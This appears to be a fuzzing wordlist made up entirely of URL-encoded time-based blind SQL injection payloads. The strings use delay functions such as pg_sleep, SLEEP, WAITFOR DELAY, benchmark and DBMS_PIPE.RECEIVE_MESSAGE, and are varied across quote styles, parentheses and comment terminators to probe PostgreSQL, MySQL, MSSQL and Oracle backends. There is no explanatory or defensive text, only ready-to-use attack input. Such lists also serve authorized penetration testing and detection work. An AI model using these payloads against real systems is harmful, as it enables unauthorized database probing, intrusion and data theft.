%22%29%20or%20UNION%20SELECT%20SLEEP%285%29--%20-
%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%27%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%22%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%27%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%22%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%29%20or%20benchmark%2850000000%2CMD5%281%29%29--%20-
%27%29%20or%20benchmark%2850000000%2CMD5%281%29%29--%20-
%22%29%20or%20benchmark%2850000000%2CMD5%281%29%29--%20-
%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%27%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%22%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%29%20or%20pg_sleep%285%29%23
%27%29%20or%20pg_sleep%285%29%23
%22%29%20or%20pg_sleep%285%29%23
%29%20or%20SELECT%20pg_sleep%285%29%23
%27%29%20or%20SELECT%20pg_sleep%285%29%23
%22%29%20or%20SELECT%20pg_sleep%285%29%23
%29%20or%20UNION%20SELECT%20pg_sleep%285%29%23
%27%29%20or%20UNION%20SELECT%20pg_sleep%285%29%23
%22%29%20or%20UNION%20SELECT%20pg_sleep%285%29%23
%29%20or%20SLEEP%285%29%23
%27%29%20or%20SLEEP%285%29%23
%22%29%20or%20SLEEP%285%29%23
%29%20or%20SELECT%20SLEEP%285%29%23
%27%29%20or%20SELECT%20SLEEP%285%29%23
%22%29%20or%20SELECT%20SLEEP%285%29%23
%29%20or%20UNION%20SELECT%20SLEEP%285%29%23
%27%29%20or%20UNION%20SELECT%20SLEEP%285%29%23
%22%29%20or%20UNION%20SELECT%20SLEEP%285%29%23
%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
%27%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
%22%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
%27%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
%22%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
%29%20or%20benchmark%2850000000%2CMD5%281%29%29%23
%27%29%20or%20benchmark%2850000000%2CMD5%281%29%29%23
%22%29%20or%20benchmark%2850000000%2CMD5%281%29%29%23
%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%27%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%22%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%29%29%20or%20pg_sleep%285%29--%20-
%27%29%29%20or%20pg_sleep%285%29--%20-
%22%29%29%20or%20pg_sleep%285%29--%20-
%29%29%20or%20SELECT%20pg_sleep%285%29--%20-
%27%29%29%20or%20SELECT%20pg_sleep%285%29--%20-
%22%29%29%20or%20SELECT%20pg_sleep%285%29--%20-
%29%29%20or%20UNION%20SELECT%20pg_sleep%285%29--%20-
%27%29%29%20or%20UNION%20SELECT%20pg_sleep%285%29--%20-
%22%29%29%20or%20UNION%20SELECT%20pg_sleep%285%29--%20-
%29%29%20or%20SLEEP%285%29--%20-
%27%29%29%20or%20SLEEP%285%29--%20-
%22%29%29%20or%20SLEEP%285%29--%20-
%29%29%20or%20SELECT%20SLEEP%285%29--%20-
%27%29%29%20or%20SELECT%20SLEEP%285%29--%20-
%22%29%29%20or%20SELECT%20SLEEP%285%29--%20-
%29%29%20or%20UNION%20SELECT%20SLEEP%285%29--%20-
%27%29%29%20or%20UNION%20SELECT%20SLEEP%285%29--%20-
%22%29%29%20or%20UNION%20SELECT%20SLEEP%285%29--%20-
%29%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%27%29%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%22%29%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%29%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%27%29%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%22%29%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%29%29%20or%20benchmark%2850000000%2CMD5%281%29%29--%20-
%27%29%29%20or%20benchmark%2850000000%2CMD5%281%29%29--%20-
%22%29%29%20or%20benchmark%2850000000%2CMD5%281%29%29--%20-
%29%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%27%29%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%22%29%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%29%29%20or%20pg_sleep%285%29%23
%27%29%29%20or%20pg_sleep%285%29%23
%22%29%29%20or%20pg_sleep%285%29%23
%29%29%20or%20SELECT%20pg_sleep%285%29%23
%27%29%29%20or%20SELECT%20pg_sleep%285%29%23
%22%29%29%20or%20SELECT%20pg_sleep%285%29%23
%29%29%20or%20UNION%20SELECT%20pg_sleep%285%29%23
%27%29%29%20or%20UNION%20SELECT%20pg_sleep%285%29%23
%22%29%29%20or%20UNION%20SELECT%20pg_sleep%285%29%23
%29%29%20or%20SLEEP%285%29%23
%27%29%29%20or%20SLEEP%285%29%23
%22%29%29%20or%20SLEEP%285%29%23
%29%29%20or%20SELECT%20SLEEP%285%29%23
%27%29%29%20or%20SELECT%20SLEEP%285%29%23
%22%29%29%20or%20SELECT%20SLEEP%285%29%23
%29%29%20or%20UNION%20SELECT%20SLEEP%285%29%23
%27%29%29%20or%20UNION%20SELECT%20SLEEP%285%29%23
%22%29%29%20or%20UNION%20SELECT%20SLEEP%285%29%23
%29%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
%27%29%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
%22%29%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
%29%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
%27%29%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
%22%29%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
%29%29%20or%20benchmark%2850000000%2CMD5%281%29%29%23
%27%29%29%20or%20benchmark%2850000000%2CMD5%281%29%29%23
%22%29%29%20or%20benchmark%2850000000%2CMD5%281%29%29%23
%29%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%27%29%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%22%29%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29bAKL%29%20AND%20vRxe%3DvRxe
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29bAKL%29%20AND%20%22vRxe%22%3D%22vRxe
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29bAKL%29%20AND%20vRxe%3DvRxe
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29bAKL%29%20AND%20%22vRxe%22%3D%22vRxe
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29bAKL%29%20AND%20vRxe%3DvRxe
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29bAKL%29%20AND%20%22vRxe%22%3D%22vRxe
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29bAKL%29%20AND%20vRxe%3DvRxe
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29bAKL%29%20AND%20%22vRxe%22%3D%22vRxe
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29bAKL%29%20AND%20vRxe%3DvRxe
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29bAKL%29%20AND%20%22vRxe%22%3D%22vRxe
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29bAKL%29%20AND%20vRxe%3DvRxe
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29bAKL%29%20AND%20%22vRxe%22%3D%22vRxe
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29bAKL%29%20AND%20vRxe%3DvRxe
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29bAKL%29%20AND%20%22vRxe%22%3D%22vRxe
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29bAKL%29%20AND%20vRxe%3DvRxe
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29bAKL%29%20AND%20%22vRxe%22%3D%22vRxe
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29bAKL%29%20AND%20vRxe%3DvRxe
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29bAKL%29%20AND%20%22vRxe%22%3D%22vRxe
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29bAKL%29%20AND%20vRxe%3DvRxe
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29bAKL%29%20AND%20%22vRxe%22%3D%22vRxe
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29YjoC%29%20AND%20%25%3D
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29YjoC%29%20AND%20%27%25%27%3D%27
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29YjoC%29%20AND%20%22%25%22%3D%22
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29YjoC%29%20AND%20%25%3D
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29YjoC%29%20AND%20%27%25%27%3D%27
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29YjoC%29%20AND%20%22%25%22%3D%22
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29YjoC%29%20AND%20%25%3D
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29YjoC%29%20AND%20%27%25%27%3D%27
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29YjoC%29%20AND%20%22%25%22%3D%22
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29YjoC%29%20AND%20%25%3D
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29YjoC%29%20AND%20%27%25%27%3D%27
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29YjoC%29%20AND%20%22%25%22%3D%22
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29YjoC%29%20AND%20%25%3D
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29YjoC%29%20AND%20%27%25%27%3D%27
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29YjoC%29%20AND%20%22%25%22%3D%22
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29YjoC%29%20AND%20%25%3D
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29YjoC%29%20AND%20%27%25%27%3D%27
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29YjoC%29%20AND%20%22%25%22%3D%22
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29YjoC%29%20AND%20%25%3D
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29YjoC%29%20AND%20%27%25%27%3D%27
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29YjoC%29%20AND%20%22%25%22%3D%22
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29YjoC%29%20AND%20%25%3D
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29YjoC%29%20AND%20%27%25%27%3D%27
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29YjoC%29%20AND%20%22%25%22%3D%22
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29YjoC%29%20AND%20%25%3D
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29YjoC%29%20AND%20%27%25%27%3D%27
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29YjoC%29%20AND%20%22%25%22%3D%22
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29YjoC%29%20AND%20%25%3D
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29YjoC%29%20AND%20%27%25%27%3D%27
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29YjoC%29%20AND%20%22%25%22%3D%22
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29nQIP%29
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29nQIP%29
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29nQIP%29
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29nQIP%29
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29nQIP%29
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29nQIP%29
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29nQIP%29
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29nQIP%29
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29nQIP%29
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29nQIP%29
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29nQIP%29
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29nQIP%29
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29nQIP%29
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29nQIP%29
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29nQIP%29
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29nQIP%29
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29nQIP%29
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29nQIP%29
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29nQIP%29
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29nQIP%29
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29nQIP%29
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29nQIP%29
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29nQIP%29
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29nQIP%29
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29nQIP%29
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29nQIP%29
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29nQIP%29
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29nQIP%29--%20-
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29nQIP%29--%20-
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29nQIP%29--%20-
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29nQIP%29--%20-
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29nQIP%29--%20-
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29nQIP%29--%20-
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29nQIP%29--%20-
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29nQIP%29--%20-
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29nQIP%29--%20-
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29--%20-
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29--%20-
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29--%20-
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29nQIP%29--%20-
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29nQIP%29--%20-
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29nQIP%29--%20-
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29nQIP%29--%20-
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29nQIP%29--%20-
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29nQIP%29--%20-
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29nQIP%29--%20-
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29nQIP%29--%20-
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29nQIP%29--%20-
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29nQIP%29--%20-
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29nQIP%29--%20-
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29nQIP%29--%20-
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29nQIP%29--%20-
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29nQIP%29--%20-
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29nQIP%29--%20-
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29nQIP%29--%20-
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29nQIP%29--%20-
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29nQIP%29--%20-
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29nQIP%29%23
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29nQIP%29%23
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29nQIP%29%23
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29nQIP%29%23
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29nQIP%29%23
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29nQIP%29%23
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29nQIP%29%23
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29nQIP%29%23
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29nQIP%29%23
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29%23
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29%23
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29%23
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29nQIP%29%23
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29nQIP%29%23
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29nQIP%29%23
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29nQIP%29%23
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29nQIP%29%23
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29nQIP%29%23
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29nQIP%29%23
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29nQIP%29%23
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29nQIP%29%23
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29nQIP%29%23
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29nQIP%29%23
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29nQIP%29%23
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29nQIP%29%23
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29nQIP%29%23
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29nQIP%29%23
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29nQIP%29%23
%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29nQIP%29%23
%22%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29nQIP%29%23
pg_sleep%285%29%3D
pg_sleep%285%29%3D%27
pg_sleep%285%29%3D%22
SELECT%20pg_sleep%285%29%3D
SELECT%20pg_sleep%285%29%3D%27
SELECT%20pg_sleep%285%29%3D%22
UNION%20SELECT%20pg_sleep%285%29%3D
UNION%20SELECT%20pg_sleep%285%29%3D%27
UNION%20SELECT%20pg_sleep%285%29%3D%22
SLEEP%285%29%3D
SLEEP%285%29%3D%27
SLEEP%285%29%3D%22
SELECT%20SLEEP%285%29%3D
SELECT%20SLEEP%285%29%3D%27
SELECT%20SLEEP%285%29%3D%22
UNION%20SELECT%20SLEEP%285%29%3D
UNION%20SELECT%20SLEEP%285%29%3D%27
UNION%20SELECT%20SLEEP%285%29%3D%22
WAITFOR%20DELAY%20%270%3A0%3A5%27%3D
WAITFOR%20DELAY%20%270%3A0%3A5%27%3D%27
WAITFOR%20DELAY%20%270%3A0%3A5%27%3D%22
WAITFOR%20DELAY%20%220%3A0%3A5%22%3D
